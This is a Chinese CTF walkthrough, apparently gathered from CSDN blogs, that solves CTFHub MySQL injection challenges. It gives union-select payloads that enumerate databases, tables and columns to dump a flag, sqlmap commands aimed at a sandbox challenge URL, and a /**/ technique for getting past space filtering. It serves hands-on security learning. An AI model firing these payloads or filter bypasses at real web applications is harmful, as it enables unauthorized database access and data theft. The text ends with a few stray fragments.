MYSQL
手工注入
1.判断字段数
输入1
输入2
输入3
得知字段有两个
2.判断注入类型
1 and 1 = 1
1 and 1=2
回显错误,说明存在sql注入
3.查看数据库内容
知道字段数量为2后,可以查看数据库位置
1 union select 1,2
使用union select 1,2查看未发现数据,判断数据可能不存在数据库中,
在id=1中加入负号可以查看到不存在数据库中的数据
-1 union select 1,2
查看数据库版本
修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22
-1 union select 1,version()
查看数据库名
修改2为database(),查看数据库名,发现数据库名为sqli
-1 union select 1,database()
查看全部数据库名
-1 union select 1,group_concat(schema_name)from information_schema.schemata
4.查看表名
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
sqli数据库中发现trbncnizbj和news两个表名(题目环境不同,得到的表名也不相同,注意修改)
5.查看字段名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='trbncnizbj'
查看trbncnizbj表中的全部字段名,发现一个数据名为iosfiklapu
6.查看flag
-1 union select 1,group_concat(iosfiklapu) from sqli.trbncnizbj
查看数据onwodzqnwq中的内容,发现此题flag
或者
3.爆数据库
123 union select 1,database()#
4.爆表名
123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'
5.爆字段
vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)
123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'vyaosuyeqw'
6.爆flag
rmutuveest
123 union select 1,rmutuveest from vyaosuyeqw
得到flag
sqlmap
http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800
爆数据库名
sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 --dbs
爆表名
sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
vyaosuyeqw
爆字段
vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)
sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw --columns
爆出flag
rmutuveest
sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw -C rmutuveest --dump
CTFHub | MySQL结构_ctfhub mysql结构-CSDN博客
CTFHub技能树之WEB MYSQL结构_ctfhubmysql结构-CSDN博客
过滤空格
过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果
():一对圆括号
+:加号
%09、%0a、%0b、%0c、%0d:TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式
/**/:块注释符
题解
注入类型
输入1
构造payload and 1 = 1,发现页面提示Hacker!!!
对空格进行过滤,也就是payload语句中的空格需要使用字符进行过滤
/**/and/**/1/**/=/**/1
1/**/and/**/1/**/=/**/2
等于2时回显错误,说明此题存在过滤空格注入
字段数
使用order by 判断字段数量
1/**/order/**/by/**/1
1/**/order/**/by/**/2
1/**/order/**/by/**/3
使用order by 3,这里无回显,那么字段数量为2列
数据库
查看数据库位置
1/**/union/**/select/**/1,2
使用union select 1,2查看未发现数据
断数据可能不存在数据库中,在id=1中加入负号查看数据
-1/**/union/**/select/**/1,2
查看数据库版本
-1/**/union/**/select/**/1,version()
发现数据库版本为MariaDB 10.3.22
查看数据库名
-1/**/union/**/select/**/1,database()
发现数据库版本为sqli
查看全部数据库名
-1/**/union/**/select/**/1,group_concat(schema_name)from/**/information_schema.schemata
表名
在全部数据库名中发现sqli
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'
最后在sqli数据库中发现uavxcnipfh和news两个表名(题目环境不同,得到的表名也不相同,注意修改)
字段
先查看uavxcnipfh表中的全部字段名,
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='uavxcnipfh'
发现一个数据名为gmrdjzkbmr
flag
-1/**/union/**/select/**/1,group_concat(gmrdjzkbmr)/**/from/**/sqli.uavxcnipfh
查看数据gmrdjzkbmr中的内容,发现此题flag
CTFHub | 过滤空格_ctfhub过滤空格-CSDN博客
与重载(Overload))
)
)
)
